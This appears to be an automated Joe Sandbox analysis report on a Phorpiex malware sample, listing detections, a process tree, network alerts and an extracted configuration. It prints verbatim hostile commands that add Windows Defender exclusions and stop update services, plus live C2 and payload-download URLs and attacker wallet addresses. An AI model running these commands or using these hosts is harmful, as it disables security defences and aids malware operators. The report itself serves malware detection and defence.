Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
thcdVit1dX.exe

Overview

General Information

Sample name:thcdVit1dX.exe
renamed because original name is a hash value
Original sample name:6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772.exe
Analysis ID:1542686
MD5:cbd0e8f0c0aefe122d41029c119624cf
SHA1:8bfafcfb05c61d27d6bf114128a891d0799dd2bd
SHA256:6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • thcdVit1dX.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\thcdVit1dX.exe" MD5: CBD0E8F0C0AEFE122D41029C119624CF)
    • 4BBF.exe (PID: 7348 cmdline: "C:\Users\user\AppData\Local\Temp\4BBF.exe" MD5: 8D8E6C7952A9DC7C0C73911C4DBC5518)
      • 71384504.exe (PID: 7464 cmdline: C:\Users\user\AppData\Local\Temp\71384504.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
        • sysppvrdnvs.exe (PID: 7488 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
          • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7660 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • WmiPrvSE.exe (PID: 7896 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 7584 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 7668 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7700 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7748 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7784 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7808 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • 2355412914.exe (PID: 8144 cmdline: C:\Users\user\AppData\Local\Temp\2355412914.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
            • cmd.exe (PID: 2316 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • reg.exe (PID: 3376 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • cmd.exe (PID: 3788 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1240 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • 2658326577.exe (PID: 1400 cmdline: C:\Users\user\AppData\Local\Temp\2658326577.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • sysppvrdnvs.exe (PID: 8108 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\2658326577.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    C:\Windows\sysppvrdnvs.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        C:\Users\user\AppData\Local\Temp\71384504.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    Click to see the 9 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    4.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      3.0.71384504.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        17.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          26.0.2658326577.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            26.2.2658326577.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                              Click to see the 3 entries

                              Sigma Signatures

                              Operating System Destruction

                              barindex
                              Sigma detected: Stop multiple services
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7488, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 7584, ProcessName: cmd.exe

                              System Summary

                              barindex
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7488, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7568, ProcessName: cmd.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7488, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7568, ProcessName: cmd.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\71384504.exe, ProcessId: 7464, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7660, ProcessName: powershell.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:17.704902+020020220501A Network Trojan was detected185.215.113.6680192.168.2.549720TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:10.813025+020020220511A Network Trojan was detected185.215.113.6680192.168.2.549720TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:17.704809+020020197142Potentially Bad Traffic192.168.2.549720185.215.113.6680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:33.655013+020020440771A Network Trojan was detected192.168.2.565053195.82.3.1540500UDP
                              2024-10-26T07:26:38.654038+020020440771A Network Trojan was detected192.168.2.5650532.184.189.18940500UDP
                              2024-10-26T07:26:43.670932+020020440771A Network Trojan was detected192.168.2.565053151.246.159.15740500UDP
                              2024-10-26T07:26:48.687298+020020440771A Network Trojan was detected192.168.2.5650532.180.10.24740500UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:20.780864+020028032742Potentially Bad Traffic192.168.2.549721185.215.113.6680TCP
                              2024-10-26T07:26:25.627582+020028032742Potentially Bad Traffic192.168.2.549721185.215.113.6680TCP
                              2024-10-26T07:26:31.911590+020028032742Potentially Bad Traffic192.168.2.549771185.215.113.6680TCP
                              2024-10-26T07:26:33.827471+020028032742Potentially Bad Traffic192.168.2.549784185.215.113.6680TCP
                              2024-10-26T07:26:39.456586+020028032742Potentially Bad Traffic192.168.2.549812185.215.113.6680TCP
                              2024-10-26T07:26:41.389569+020028032742Potentially Bad Traffic192.168.2.549823185.215.113.6680TCP
                              2024-10-26T07:26:44.712858+020028032742Potentially Bad Traffic192.168.2.54984191.202.233.14180TCP
                              2024-10-26T07:26:48.393009+020028032742Potentially Bad Traffic192.168.2.549864185.215.113.6680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:19.836764+020028565631A Network Trojan was detected192.168.2.5546771.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:10.813025+020028376771A Network Trojan was detected185.215.113.6680192.168.2.549771TCP
                              2024-10-26T07:26:34.137114+020028376771A Network Trojan was detected185.215.113.6680192.168.2.549784TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:10.813025+020028532721A Network Trojan was detected185.215.113.6680192.168.2.549720TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:25.627582+020028532921Malware Command and Control Activity Detected192.168.2.549721185.215.113.6680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-26T07:26:31.911590+020028482951A Network Trojan was detected192.168.2.549771185.215.113.6680TCP
                              2024-10-26T07:26:33.827471+020028482951A Network Trojan was detected192.168.2.549784185.215.113.6680TCP
                              2024-10-26T07:26:39.456586+020028482951A Network Trojan was detected192.168.2.549812185.215.113.6680TCP
                              2024-10-26T07:26:41.389569+020028482951A Network Trojan was detected192.168.2.549823185.215.113.6680TCP
                              2024-10-26T07:26:48.393009+020028482951A Network Trojan was detected192.168.2.549864185.215.113.6680TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: thcdVit1dX.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Source: C:\Windows\sysppvrdnvs.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                              Found malware configuration
                              Source: 26.0.2658326577.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
                              Multi AV Scanner detection for domain / URL
                              Source: twizt.netVirustotal: Detection: 19%Perma Link
                              Source: http://185.215.113.66/pei.exeVirustotal: Detection: 16%Perma Link
                              Multi AV Scanner detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeReversingLabs: Detection: 75%
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeReversingLabs: Detection: 81%
                              Source: C:\Windows\sysppvrdnvs.exeReversingLabs: Detection: 81%
                              Multi AV Scanner detection for submitted file
                              Source: thcdVit1dX.exeReversingLabs: Detection: 65%
                              Source: thcdVit1dX.exeVirustotal: Detection: 61%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exeJoe Sandbox ML: detected
                              Source: C:\Windows\sysppvrdnvs.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: thcdVit1dX.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00465284 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_00465284
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041D96C DecryptFileW,0_2_0041D96C
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041C9B3 CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_0041C9B3
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041CB34 CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_0041CB34
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041DC5C ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,DecryptFileW,LocalFree,0_2_0041DC5C
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041DC0A DecryptFileW,0_2_0041DC0A
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040C830
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040C830
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,17_2_0040C830

                              Phishing

                              barindex
                              Yara detected Phorpiex
                              Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.71384504.exe.400000.0.unpack, type: UNPACKEDPE
